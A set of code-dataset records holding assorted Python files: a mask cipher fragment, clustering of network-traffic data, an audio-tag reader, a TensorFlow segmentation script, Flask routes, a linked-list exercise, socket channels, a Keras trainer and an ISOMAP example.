constructor.\n \"\"\"\n def cryptText(self):\n sCrypted = \"\"\n for iKey, cValue in enumerate(self.sText):\n sCrypted += self.__cryptChar(cValue, self.sMask[iKey])\n return sCrypted\n\n \"\"\"\n This function calls __decryptChar to decrypt\n the text using the key passed as a parameter.\n \"\"\"\n def decryptText(self, sMask):\n sDecrypted = \"\"\n for iKey, cValue in enumerate(self.sText):\n sDecrypted += self.__decryptChar(cValue, sMask[iKey])\n return sDecrypted\n\n","sub_path":"opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"182552684","text":"import os\nimport pandas as pd\nfrom sklearn.cluster import KMeans\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.decomposition import PCA\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nfrom sklearn.cluster import AgglomerativeClustering\n\n\nCIC_data_folder = \"./shortened_data\"\n\n\n\n\n\ncolor_map = []\ncolor_map_explicit = []\ncolor_set = ['red','blue','yellow','green','orange','purple','lawngreen','magenta','cyan','darkviolet','plum','mediumturquoise','springgreen','lightcoral','gold','aquamarine','darkcyan','royalblue','slategrey','indigo','olivedrab','blueviolet','palegreen','peru','chocolate','firebrick','wheat','salmon','turquoise','black']\ndata = pd.DataFrame()\ndatanum = 0\nfor entry in os.scandir(CIC_data_folder):\n #data = data.append(pd.read_csv(entry, header=None).drop(columns=[0,1]), ignore_index=True)\n if data.empty:\n data = pd.read_csv(entry, header=None).drop([0])\n else:\n data = data.append(pd.read_csv(entry, header=None).drop([0]), ignore_index=True)\n for row in range(0,len(pd.read_csv(entry, header=None).drop([0]).index)):\n color_map_explicit.append(color_set[datanum])\n datanum +=1\ndata = data.drop(columns=[0,1])\nprint(data)\n\nnumber_of_rows = 
len(data.index)\n\n\n\n\nnumber_of_clusters = 2\n\n# kmeans = KMeans(n_clusters=number_of_clusters).fit(data)\n# k_cluster = kmeans.labels_\n# agglomerativeCluster = AgglomerativeClustering(n_clusters=number_of_clusters).fit(data)\n# a_cluster = agglomerativeCluster.labels_\ncluster_DBSCAN = DBSCAN(eps=4, min_samples=5).fit(data)\nd_cluster = cluster_DBSCAN.labels_\nprint(max(d_cluster))\n#print(d_cluster)\n\n\n#set up color map based on each row's cluster label\nfor row in range(0,number_of_rows):\n color_map.append(color_set[d_cluster[row]])\n\n\n#Visualization (PCA Algorithm)\npca_3d = PCA(n_components=3)\nPCs_3d = pd.DataFrame(pca_3d.fit_transform(data))\n\n#Visualization (t-SNE Algorithm)\n\n\n\ntsne_2d = TSNE(n_components=2, perplexity=3) #7,10,11,13,17,19 ,20-22, 27\nTCs_2d = pd.DataFrame(tsne_2d.fit_transform(data))\n \n \n# bx = plt.axes(projection =\"3d\")\n# bx.scatter3D(TCs_2d.loc[:,0],TCs_2d.loc[:,1], TCs_2d.loc[:,2], color = color_map)\n \n \n# plt.title(\"stuff\")\n# plt.show()\n\n#ax = plt.axes(projection =\"3d\")\n#ax.scatter3D(PCs_3d.loc[:,0],PCs_3d.loc[:,1],PCs_3d.loc[:,2], color = color_map)\n#plt.scatter(PCs_3d.loc[:,0],PCs_3d.loc[:,1],c = color_map)\n\n\n#cx = plt.axes(projection =\"3d\")\n#cx.scatter3D(TCs_2d.loc[:,0],TCs_2d.loc[:,1], TCs_2d.loc[:,2], color = color_map_explicit)\np1 = plt.figure(1)\nplt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map_explicit)\nplt.title('t-SNE, Explicit Coloring')\np2 = plt.figure(2)\nplt.scatter(TCs_2d.loc[:,0],TCs_2d.loc[:,1],c = color_map)\nplt.title('t-SNE, Cluster Coloring, DBSCAN')\nplt.show()","sub_path":"Current Files/CIC_dataset_test_v2.py","file_name":"CIC_dataset_test_v2.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"412775180","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport re\nimport os\nimport sys\nimport platform\nfrom mutagen.id3 import ID3\nfrom mutagen.id3 import ID3NoHeaderError\nfrom mutagen import MutagenError\nfrom urllib.parse import unquote\n\nclass track:\n \"\"\"\n Track's class, each track is a music file such as mp3, ogg, wma (sic), mpc, flac...\n \"\"\"\n\n def __init__(self,fileName=\"\",extension=\"\",subPath=\"\"):\n self.trackID = 0\n self.title = \"\"\n self.album = \"\"\n self.artist = \"\"\n self.year = 0\n self.trackNumber = 0\n self.position = 0\n self.fileName = fileName\n self.subPath = subPath\n self.path = \"\"\n self.extension = extension\n self.musicDirectoryID = \"\"\n self.mrl = \"\"\n self.parentAlbum = None\n self.radioName = \"\"\n self.radioStream = \"\"\n\n\n\n def printInfos(self):\n print(\"TrackTitle: \"+self.title)\n\n def getFilePathInAlbumDir(self):\n return os.path.join(self.subPath,self.fileName+self.extension)\n\n def setPath(self,path):\n self.subPath = \"\"\n self.path = os.path.dirname(path)\n basename = os.path.basename(path)\n self.fileName, self.extension = os.path.splitext(basename)\n\n def getArtistName(self):\n if self.parentAlbum is not None:\n return self.parentAlbum.artistName\n else:\n return self.artist\n\n\n def getAlbumTitle(self):\n if self.parentAlbum is not None:\n return self.parentAlbum.title\n else:\n return self.album\n\n def getTrackTitle(self):\n if self.radioName != \"\":\n return self.radioName\n else:\n return self.title\n \n\n\n def extractDataFromTagsWithVLC(self,player,dir):\n \"\"\"Extract ID3 metadata with VLC\"\"\"\n parsedMedia = player.getParsedMedia(os.path.join(dir,self.getFilePathInAlbumDir()))\n self.title = 
parsedMedia.get_meta(0)\n self.album = parsedMedia.get_meta(4)\n self.artist = parsedMedia.get_meta(1)\n self.trackNumber = parsedMedia.get_meta(5)\n self.year = parsedMedia.get_meta(8)\n print(\"title=\"+self.title+\" album=\"+str(self.album)+\" artist=\"+str(self.artist)+\" N°\"+str(self.trackNumber))\n\n\n def setMRL(self,mrl):\n self.mrl = mrl\n path = unquote(mrl)\n if platform.system() == \"Windows\":\n path = path.replace(\"file:///\",\"\")\n else:\n path = path.replace(\"file://\",\"\")\n self.setPath(path)\n\n\n def getMutagenTags(self,dir=\"\"):\n \"\"\"Extract ID3 metadatas with Mutagen\"\"\"\n try:\n if dir != \"\":\n trackPath = os.path.join(dir,self.getFilePathInAlbumDir())\n else:\n trackPath = os.path.join(self.path,self.getFilePathInAlbumDir())\n\n audio = ID3(trackPath)\n\n self.artist = str(audio.get('TPE1'))\n self.album = str(audio.get('TALB'))\n self.title = str(audio.get(\"TIT2\"))\n self.year = str(audio.get(\"TDRC\"))\n self.trackNumber = str(audio.get(\"TRCK\"))\n\n if self.title in(\"\",\"None\"): self.title = self.fileName\n\n except ID3NoHeaderError:\n print(\"No tags\")\n\n except MutagenError:\n print(\"MutagenError:\"+trackPath)\n\n except:\n print(\"exception mutagen: \"+str(sys.exc_info()[0]))\n\n if self.title in(\"\",\"None\"): self.title = self.fileName","sub_path":"track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"260545795","text":"import numpy as np\nfrom PIL import Image\nimport time\n\nimport tensorflow as tf\nslim = tf.contrib.slim\n\nfn = '01_sat.png'\n\nmean = [103.939, 116.779, 123.68]\n\nchannel_num = 6;\nchannel_name = ['building', 'road', 'water', 'farm', 'tree', 'other']\n\ndef clamp(img):\n img[img<0] = 0\n img[img>255] = 255\n return img\n\ndef vgg_arg_scope(weight_decay=0.0005):\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\n activation_fn=tf.nn.relu,\n weights_regularizer=slim.l2_regularizer(weight_decay),\n biases_initializer=tf.zeros_initializer()):\n with slim.arg_scope([slim.conv2d], padding='SAME') as arg_sc:\n return arg_sc\n\ndef leaky_relu_001(x):\n return tf.nn.leaky_relu(x, alpha=0.01)\n\ndef vgg_16(inputs, is_training=True, keep_prob=0.5, scope='vgg_16'):\n with tf.variable_scope(scope, 'vgg_16', [inputs]) as sc:\n # Collect outputs for conv2d, fully_connected and max_pool2d.\n with slim.arg_scope([slim.conv2d], activation_fn=leaky_relu_001):\n C1 = slim.repeat(inputs, 2, slim.conv2d, 64, [3, 3], scope='conv1')\n P1 = slim.max_pool2d(C1, [2, 2], scope='pool1')\n C2 = slim.repeat(P1, 2, slim.conv2d, 128, [3, 3], scope='conv2')\n P2 = slim.max_pool2d(C2, [2, 2], scope='pool2')\n C3 = slim.repeat(P2, 3, slim.conv2d, 256, [3, 3], scope='conv3')\n P3 = slim.max_pool2d(C3, [2, 2], scope='pool3')\n C4 = slim.repeat(P3, 3, slim.conv2d, 512, [3, 3], scope='conv4')\n P4 = slim.max_pool2d(C4, [2, 2], scope='pool4')\n C5 = slim.repeat(P4, 3, slim.conv2d, 512, [3, 3], scope='conv5')\n P5 = slim.max_pool2d(C5, [2, 2], scope='pool5')\n\n C6 = slim.conv2d(P5, 1024, [7, 7], scope='conv6')\n C6D = slim.dropout(C6, keep_prob=keep_prob, is_training=is_training, scope='drop6')\n C7 = slim.conv2d(C6D, 1024, [1, 1], scope='conv7')\n C7D = slim.dropout(C7, keep_prob=keep_prob, is_training=is_training, scope='drop7')\n\n D5 = slim.conv2d(C7D, 512, [3, 3], scope='deconv5_conv1')\n PC5 = slim.conv2d(P5, 512, [3, 3], scope='deconv5_conv2')\n D4 = slim.layers.conv2d_transpose(tf.concat([D5, PC5], axis=3), 512, [4, 
4], [2, 2], padding='SAME', scope='deconv4')\n PC4 = slim.conv2d(P4, 512, [3, 3], scope='deconv4_conv2')\n D3 = slim.layers.conv2d_transpose(tf.concat([D4, PC4], axis=3), 256, [4, 4], [2, 2], padding='SAME', scope='deconv3')\n PC3 = slim.conv2d(P3, 256, [3, 3], scope='deconv3_conv2')\n D2 = slim.layers.conv2d_transpose(tf.concat([D3, PC3], axis=3), 256, [4, 4], [2, 2], padding='SAME', scope='deconv2')\n PC2 = slim.conv2d(P2, 256, [3, 3], scope='deconv2_conv2')\n D1 = slim.layers.conv2d_transpose(tf.concat([D2, PC2], axis=3), 128, [4, 4], [2, 2], padding='SAME', scope='deconv1')\n PC1 = slim.conv2d(P1, 128, [3, 3], scope='deconv1_conv2')\n D0 = slim.layers.conv2d_transpose(tf.concat([D1, PC1], axis=3), 128, [4, 4], [2, 2], padding='SAME', scope='deconv0')\n logits = slim.conv2d(D0, channel_num, [3, 3], scope='logits')\n\n return logits\n\ndef ConvNet(input):\n curr_arg_scope = vgg_arg_scope()\n with slim.arg_scope(curr_arg_scope):\n logits = vgg_16(input, is_training=False, keep_prob=1.0)\n\n with tf.name_scope('classify'):\n result = tf.nn.softmax(logits, name='result') # softmax applied to last dimension. or, specified by \"dim\"\n\n return result\n\ntest_fn = ConvNet\n\ninput = tf.placeholder(tf.float32, [None, None, None, 3])\nprediction = test_fn(input)\nresult = tf.identity(prediction, name='result')\n\nsess = tf.InteractiveSession()\nsaver = tf.train.Saver(max_to_keep=3)\nsaver.restore(sess, 'checkpoint/last_checkpoint.ckpt')\n\ntemp_sat_PIL = Image.open(fn)\ntemp_sat = np.array(temp_sat_PIL)\ntemp_sat_ = np.copy(temp_sat).astype('float32')\nfor ch in range(3):\n temp_sat_[..., ch] -= mean[ch]\nth, tw, tc = temp_sat_.shape\nimg_input = np.zeros((1, th, tw, 3))\nimg_input[0, :, :, :] = temp_sat_\nc0 = img_input.astype('float32')\n\ntic = time.perf_counter() # time.clock() was removed in Python 3.8\n\ntest_result = sess.run(result, feed_dict={input: c0})\n\ntb, th, tw, tc = test_result.shape\ntest_img = np.zeros((th, tw, 3))\ntest_img_ = test_result[0, ...]\ntest_back = np.zeros((th, tw))\nfor j in range(channel_num-1):\n test_back += test_img_[:, :, j]\n\ntest_norm = np.copy(test_back)\ntest_norm[test_norm < 1.0] = 1.0\n\ntest_back[test_back > 1.0] = 1.0\ntest_back = 1 - test_back\n\nfor j in range(channel_num):\n test_img_[..., j] /= test_norm\n\ntest_img[:, :, 0] = test_img_[:, :, 0] * 0 + test_img_[:, :, 1] * 255 + test_img_[:, :, 2] * 255 + test_img_[:, :, 3] * 0 + test_img_[:, :, 4] * 0 + test_back * 255\ntest_img[:, :, 1] = test_img_[:, :, 0] * 0 + test_img_[:, :, 1] * 0 + test_img_[:, :, 2] * 223 + test_img_[:, :, 3] * 255 + test_img_[:, :, 4] * 80 + test_back * 255\ntest_img[:, :, 2] = test_img_[:, :, 0] * 255 + test_img_[:, :, 1] * 0 + test_img_[:, :, 2] * 206 + test_img_[:, :, 3] * 0 + test_img_[:, :, 4] * 0 + test_back * 255\n\ntoc = time.perf_counter()\nprocess_time = '%4.2f(s)' % (toc-tic)\n\ntest_img_PIL = Image.fromarray(np.uint8(test_img[..., ::-1]))\ntest_img_PIL.save('test.png')\n","sub_path":"ss/test_SS.py","file_name":"test_SS.py","file_ext":"py","file_size_in_byte":5082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}{"seq_id":"429716844","text":"from flask import Blueprint, request, session, render_template\nfrom models.user import requires_login\n\nuser_blueprint = Blueprint('users', __name__)\n\n\n@user_blueprint.route('/login')\ndef login_user():\n is_logged_in = False if not session.get('email') else True\n return render_template(\"users/login.html\", is_logged_in=is_logged_in)\n\n\n@user_blueprint.route('/register')\ndef register_user():\n is_logged_in = False if not 
session.get('email') else True\n return render_template(\"users/register.html\", is_logged_in=is_logged_in)\n\n\n@user_blueprint.route('/profile', methods=['GET', 'POST'])\n@requires_login\ndef profile():\n is_logged_in = False if not session.get('email') else True\n if request.method == 'POST':\n uname = request.form['uname']\n api_key = request.form['key']\n return render_template(\"users/profile.html\", uname=uname, api_key=api_key, is_logged_in=is_logged_in)\n\n return render_template(\"users/login.html\", is_logged_in=is_logged_in)\n\n\n@user_blueprint.route('/logout')\n@requires_login\ndef logout():\n session.pop('email')\n return render_template(\"home.html\", is_logged_in=False)\n","sub_path":"views/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"60130977","text":"import socket\nfrom application.channel import (Channel, BaseChannel, SenderChannel,\n ReceiverChannel)\nfrom application.message import Message\n\n\nclass BaseSChannel(BaseChannel):\n def __init__(self,\n endpoint: str=None,\n url: str=None):\n\n super(BaseSChannel, self).__init__(endpoint, url)\n\n if self.scheme != 'tcp':\n raise ValueError('Wrong scheme definition')\n\n\nclass SSenderChannel(BaseSChannel, SenderChannel):\n\n def __init__(self,\n endpoint: str=None,\n url: str=None):\n\n super(SSenderChannel, self).__init__(endpoint, url)\n\n # create a socket\n self._connector = socket.socket(socket.AF_INET,\n socket.SOCK_STREAM)\n # connect\n self._connector.connect((self._hostname, self._port))\n\n def send(self, message: Message):\n self._connector.send(message.body.encode())\n\n def close(self):\n self._connector.close()\n\n\nclass SReceiverChannel(BaseSChannel, ReceiverChannel):\n\n MAX_CONNECTIONS = 10\n BUFFER_SIZE = 1024\n\n def __init__(self,\n endpoint: str=None,\n url: str=None):\n\n super(SReceiverChannel, self).__init__(endpoint, url)\n\n # create a socket\n self._connector = socket.socket(socket.AF_INET,\n socket.SOCK_STREAM)\n # bind socket\n self._connector.bind((self._hostname, self._port))\n print('bind: {} {}'.format(self._hostname, self._port))\n # start listening\n self._connector.listen(self.MAX_CONNECTIONS)\n\n def receive(self) -> Message:\n\n # accept connection\n conn, addr = self._connector.accept()\n print('Connected with {} {}\\n'.format(addr[0], str(addr[1])))\n # get message from sender\n data = conn.recv(self.BUFFER_SIZE).decode()\n conn.close()\n\n if data:\n return Message(data)\n else:\n return None\n\n def close(self):\n self._connector.close()\n\nclass SChannel(Channel):\n @classmethod\n def create(cls, endpoint: str, url: str) -> BaseSChannel:\n if endpoint == cls.SENDER:\n return SSenderChannel(endpoint=endpoint, url=url)\n if endpoint == cls.RECEIVER:\n return SReceiverChannel(endpoint=endpoint, url=url)\n","sub_path":"technology/msocket/schannel.py","file_name":"schannel.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"264678076","text":"import task_project_schedule as tps\nimport os\nimport re\n\ndef load_tasks(stripped_lines, n_act, n_res):\n tasks = {}\n for activity in range(n_act):\n line_1 = stripped_lines[activity+1]\n line_2 = stripped_lines[n_act+activity+1]\n task_id = int(line_1[0])\n n_succ = int(line_1[2]) #number of successors\n succ_ids = []\n if n_succ > 0:\n for i in range(n_succ):\n succ_ids.append(int(line_1[3+i]))\n w = 
int(line_2[3]) #principal work-content\n u_lower, u_upper = [], []\n for r in range(n_res):\n u_lower.append(int(line_2[4+2*r]))\n u_upper.append(int(line_2[4+2*r+1]))\n task = tps.Task(task_id, w, u_lower[0], u_upper[0], succ_ids)\n tasks[task_id] = task\n return tasks\n\ndef load_project(project_file_path):\n with open(project_file_path, 'r') as f:\n raw_lines = f.read().splitlines()\n stripped_lines = []\n for line in raw_lines:\n stripped_lines.append(re.split('\\t', line))\n first_line = stripped_lines[0]\n n_act = int(first_line[0])+2 #total number of activities incl. dummies\n n_res = int(first_line[1])\n last_line = stripped_lines[2*n_act + 1]\n b = [] #resource availabilities\n for r in range(n_res):\n b.append(int(last_line[r]))\n l = int(last_line[n_res]) #min. block length\n tasks = load_tasks(stripped_lines, n_act, n_res)\n project = tps.Project(project_file_path, tasks, b[0], l)\n return project\n\nproject_file_path = \"test_instance.sch\"\n\nproject = load_project(project_file_path)\n\nschedules = project.get_heuristic_schedules()\nprint(\"schedule makespans: \", [schedule.makespan for schedule in schedules])\nbest_schedule = schedules[0]\nprint(\"l: \", project.l)\nprint(\"w: \", project.R_max)\nprint(\"resource_availability: \", best_schedule.resource_availability)\nprint(\"task_resource_usages: \", best_schedule.task_resource_usage)\nprint(\"optimal makespan: \", max(best_schedule.resource_availability.keys()))\nprint(\"optimal activity list representation: \", [task.id for task in best_schedule.alr.values()])\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"212452894","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\n\nfrom flask import Flask, redirect, url_for\nfrom flask_bootstrap import Bootstrap\n\napp = Flask(__name__)\nBootstrap(app)\n\n################################################################################\n### Override with specific settings based on the FLASK_ENV env var\n################################################################################\n\nif os.environ.get(\"FLASK_ENV\") == 'prod':\n app.config.from_object('app.config.config.ProductionConfig')\nelse:\n # fall back to development settings when FLASK_ENV is unset or not 'prod'\n app.config.from_object('app.config.config.DevelopmentConfig')\n\n################################################################################\n### Extra Jinja Filters\n################################################################################\n\n@app.template_filter()\ndef display_beer_icon_filter(value):\n escaped_beer_name = value.lower().replace(\" \", \"_\")\n\n if os.path.isfile(\"%s/static/img/beers/%s.png\" %(app.config['BASE_DIR'], escaped_beer_name)):\n return url_for('static', filename=\"img/beers/%s.png\" %(escaped_beer_name))\n else:\n return url_for('static', filename='img/beers/unknown.png')\n\napp.jinja_env.filters['display_beer_icon'] = display_beer_icon_filter\n\n################################################################################\n### Elasticsearch Setup\n################################################################################\n\nfrom elasticsearch import Elasticsearch\n\nes = Elasticsearch(\"%s:%s\" %(app.config['ELASTICSEARCH_DNS'],\n app.config['ELASTICSEARCH_PORT']))\n\n################################################################################\n# Blueprints 
registration\n################################################################################\n\nfrom app.home.controllers import home\nfrom app.heartbeat.controllers import heartbeat\n\napp.register_blueprint(home)\napp.register_blueprint(heartbeat)\n\n@app.route('/', methods=['GET'])\n# @app.errorhandler(404)\ndef index(error=None):\n return redirect(url_for('home.display'))","sub_path":"webapp/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"571738045","text":"class Node:\n def __init__(self, value):\n self.value = value\n self.next = None\n\nclass Slist:\n def __init__(self):\n self.head = None\n\n def addfront(self, val):\n nn = Node(val)\n nn.next = self.head\n self.head = nn\n\n def kthElemFromTheEnd(self, k):\n \"\"\"Return the value of the kth node from the end (k=1 is the last node).\"\"\"\n if k <= 0:\n return None\n length, runner = 0, self.head\n while runner:\n length, runner = length + 1, runner.next\n if k > length:\n return None\n temp = self.head\n for _ in range(length - k):\n temp = temp.next\n return temp.value\n\n def removeNthFromEnd(self, n):\n length, count, temp = 1, 1, self.head\n\n while temp.next:\n length, temp = length + 1, temp.next\n temp = self.head\n\n if length == n:\n # removing the head itself\n self.head = self.head.next\n return self\n\n while count < length - n:\n count, temp = count + 1, temp.next\n temp.next = temp.next.next\n return self\n\n def kthwith2whileloops(self, k):\n # two-pointer version: send a runner k nodes ahead, then advance both in step;\n # when the lead runner walks off the end, the trailing one is kth from the end\n runner = runner2 = self.head\n count = 0\n\n while count < k:\n runner2 = runner2.next\n count += 1\n\n while runner2:\n runner = runner.next\n runner2 = runner2.next\n\n return runner.value\n\n def printlist(self):\n runner = self.head\n while runner:\n print(runner.value, end = \" \")\n runner = runner.next\n print()\n\nmylist = Slist()\nmylist.addfront(6)\nmylist.addfront(5)\nmylist.addfront(4)\nmylist.addfront(3)\nmylist.addfront(2)\nmylist.addfront(1)\n\nmylist.printlist()\nk = 2\nprint(f\"the k={k}th element from the end is:\", mylist.kthwith2whileloops(k))\nprint(\"check with the length-based version:\", mylist.kthElemFromTheEnd(k))\n\n#mylist.removeNthFromEnd(2)\n\nmylist.printlist()\n","sub_path":"python/data_structures/kthelementformtheend.py","file_name":"kthelementformtheend.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"290098981","text":"#! 
/usr/bin/env python\n\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Dropout\nfrom keras.optimizers import SGD, RMSprop\nfrom keras.regularizers import l1, l2, l1_l2\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport argparse, tarfile, os, tempfile, shutil, json\n\nfrom keras import backend as K\n\ndef create_model():\n with open('hyperparameters.json', 'r') as f:\n spec = json.load(f)\n\n model = Sequential()\n\n layer = spec['layers']\n units = layer.pop('units')\n dropout = layer.pop('dropout', None)\n next_layer = layer.pop('next', None) # renamed from 'next' to avoid shadowing the builtin\n\n print(layer)\n model.add(Dense(units, input_shape=(3,), **layer))\n if dropout is not None and 'rate' in dropout:\n model.add(Dropout(dropout['rate']))\n\n layer = next_layer\n\n while layer is not None:\n print(layer)\n units = layer.pop('units')\n dropout = layer.pop('dropout', None) # default to None, as above, so a missing key cannot raise\n next_layer = layer.pop('next', None)\n model.add(Dense(\n units,\n input_shape=(units,),\n **layer\n ))\n\n if dropout is not None and 'rate' in dropout:\n model.add(Dropout(dropout['rate']))\n\n layer = next_layer\n\n model.add(Dense(1, activation='sigmoid'))\n\n opt = spec.pop('optimizer')\n if opt == 'sgd':\n opt = SGD(lr=spec['lr'])\n elif opt == 'rmsprop':\n opt = RMSprop(lr=spec['lr']) # the imported name is RMSprop, not RMSProp\n\n model.compile(\n optimizer=opt,\n loss=spec['loss'],\n metrics=[accuracy]\n )\n\n return model\n\n\ndef accuracy(y_true, y_pred):\n # round the sigmoid output before comparing, so this is standard binary accuracy\n correct = K.equal(K.round(y_pred), y_true)\n n = K.sum(K.cast(correct, 'float32'))\n t = K.sum(K.ones_like(y_true, dtype='float32'))\n return n / t\n\n\ndef write_output(loss, acc):\n with open('performance.json', 'w') as f:\n json.dump({'loss': loss, 'acc': acc}, f)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Train ANN auto-encoder.')\n parser.add_argument('infile',\n help='File name for reading events.')\n\n parser.add_argument('-o','--out', dest='outbase', metavar='OUTBASE',\n default='model',\n help='File name base (no extension) ' +\n 'for saving model structure and weights (two separate ' +\n 'files).')\n\n parser.add_argument('-N','--num-epochs',\n default=10, type=int,\n help='Number of epochs')\n\n parser.add_argument('-b','--batch-size',\n default=256, type=int,\n help='Minibatch size')\n\n parser.add_argument('-l','--layer', dest='layers',\n metavar = 'NH', action='append',\n type=int,\n help='Specify a layer with %(metavar)s hidden units. ' +\n 'Multiple layers can be specified')\n\n parser.add_argument('--reg-type', choices = ['l1','l2','l1_l2'],\n help='Type of regularization to apply')\n\n parser.add_argument('--reg-penalty',type=float, default=0.001,\n help='Regularization penalty')\n\n def restricted_float(x):\n x = float(x)\n if x < 0.0 or x > 1.0:\n raise argparse.ArgumentTypeError(\"%r not in range [0.0, 1.0]\"%(x,))\n return x\n\n parser.add_argument('--train-fraction',type=restricted_float,\n default = 0.9,\n help='Fraction (between 0. and 1.) of the examples in '+\n 'the input file to use for training. The rest is used '+\n 'for testing.')\n\n args = parser.parse_args()\n\n # Keep track of all the output files generated so they can be\n # stuffed into a tar file. (Yes, a tarfile. I'm old, OK?)\n outFileList = []\n tmpDirName = tempfile.mkdtemp()\n\n # Load the data\n npfile = np.load(args.infile)\n\n inputs = npfile['inputs']\n outputs = npfile['outputs']\n\n # Standardize the input so that it has mean 0 and std dev. of 1. 
This helps\n # tremendously with training performance.\n # inputMeans = inputs[0:int(inputs.shape[0]*args.train_fraction),:].mean(axis=0)\n # inputStdDevs = inputs[0:int(inputs.shape[0]*args.train_fraction),:].std(axis=0)\n # inputs = (inputs-inputMeans)/inputStdDevs\n # outputMeans = outputs[0:int(outputs.shape[0]*args.train_fraction)].mean(axis=0)\n # outputStdDevs = outputs[0:int(outputs.shape[0]*args.train_fraction)].std(axis=0)\n # outputs = (outputs-outputMeans)/outputStdDevs\n\n inputMeans = inputs.mean(axis=0)\n inputStdDevs = inputs.std(axis=0)\n inputs = (inputs-inputMeans)/inputStdDevs\n outputMeans = outputs.mean(axis=0)\n outputStdDevs = outputs.std(axis=0)\n outputs = (outputs-outputMeans)/outputStdDevs\n\n npFileName = 'std.npz'\n outFileList.append(npFileName)\n np.savez_compressed(os.path.join(tmpDirName,npFileName),\n inputMeans=inputMeans,\n inputStdDevs=inputStdDevs,\n outputMeans=outputMeans,\n outputStdDevs=outputStdDevs)\n\n if False:\n # Initialize the appropriate regularizer (if any)\n reg = None\n if args.reg_type == \"l1\":\n reg = l1(args.reg_penalty)\n elif args.reg_type == \"l2\":\n reg = l2(args.reg_penalty) # was l1 by mistake\n elif args.reg_type == \"l1_l2\":\n reg = l1_l2(args.reg_penalty)\n\n # Check the requested layers. If none, make the simplest\n # possible: 1 layer with number of nodes equal to the size of the\n # input.\n if hasattr(args,'layers') and args.layers is not None:\n layers = args.layers\n else:\n layers = [inputs.shape[1]]\n\n\n # Build a model\n model = Sequential()\n #print layers\n # First layer\n model.add(Dense(1,input_dim=3))\n model.add(Activation('linear'))\n\n model.compile(loss='mse',\n optimizer='adam')\n\n # The simple linear model above is immediately replaced by the spec-driven one.\n model = create_model()\n train_split = int(inputs.shape[0] * args.train_fraction)\n model.fit(\n inputs[0:train_split],\n outputs[0:train_split],\n batch_size=args.batch_size,\n epochs=args.num_epochs\n )\n\n # evaluate() returns [loss, metric] because the model was compiled with a metric\n loss, acc = model.evaluate(inputs[train_split:], outputs[train_split:], batch_size=args.batch_size)\n write_output(loss, acc)\n j = model.to_json()\n with open('model.json', 'w') as f:\n json.dump(j, f)\n model.save_weights('weights.h5')\n # Add callbacks\n # filepath = 'model.h5'\n # outFileList.append(filepath)\n # checkpoint = ModelCheckpoint(os.path.join(tmpDirName,filepath), monitor = 'val_loss', mode = 'min', save_best_only = True)\n # model.summary()\n\n # hist = model.fit(inputs, outputs, validation_split=(1-args.train_fraction),\n # epochs=args.num_epochs, batch_size=args.batch_size, verbose=2, callbacks=[checkpoint])\n\n # print 'Tarring outfiles...'\n # outfile_name = '{}_N{}_b{}_l{}_frac{:f}'.format(args.outbase,\n # args.num_epochs,\n # args.batch_size,\n # '_'.join([str(l) for l in layers]),\n # args.train_fraction)\n # if hasattr(args,'reg_type') and args.reg_type != None:\n # outfile_name += ('{}{:f}'.format(args.reg_type,args.reg_penalty))\n #\n # outfile_name += '.tgz'\n #\n # with tarfile.open(outfile_name,'w:gz') as tar:\n # for f in outFileList:\n # tar.add(os.path.join(tmpDirName,f),f)\n #\n # shutil.rmtree(tmpDirName)\n #\n # print 'Done.'\n","sub_path":"v_to_sum/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"252836040","text":"#####################################################################\n#\n# ISOMAP (Isometric Feature Mapping) analysis example on Swiss Roll data.\n# =======================================================================\n#\n# DATASET URL: http://isomap.stanford.edu/datasets.html\n# ------------\n#\n# The 
following files are used to run the analysis here:\n#\n# swiss_roll_data.mat: Data coordinates are contained in X_data and Y_data\n# variables\n# --------------------------------------\n# The code is based on Python 2.7.\n# Please install the numpy, scipy and matplotlib packages before using.\n# Update matplotlib to the latest version to enable 3-D plotting.\n# Thank you for your suggestions!\n#\n# @version 1.0\n# --------------------------------------\n#####################################################################\nimport scipy.io as sio \nimport numpy as np\nfrom scipy.sparse import csc_matrix, csgraph\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D \n\nmatFile = sio.loadmat('swiss_roll_data.mat')\n\nx = matFile['X_data']\nx = np.array(x)\nx = x[:, np.arange(0, x.shape[1], 10)]\n\ny = matFile['Y_data']\ny = np.array(y)\ny = y[:, np.arange(0, y.shape[1], 10)]\n\n# number of data points to work with \nm = x.shape[1]\n\n# Plot 3D scatter of the original data points. Rotate the figure using the\n# rotate-3D button in the figure window's toolbar to see the 3D swiss\n# 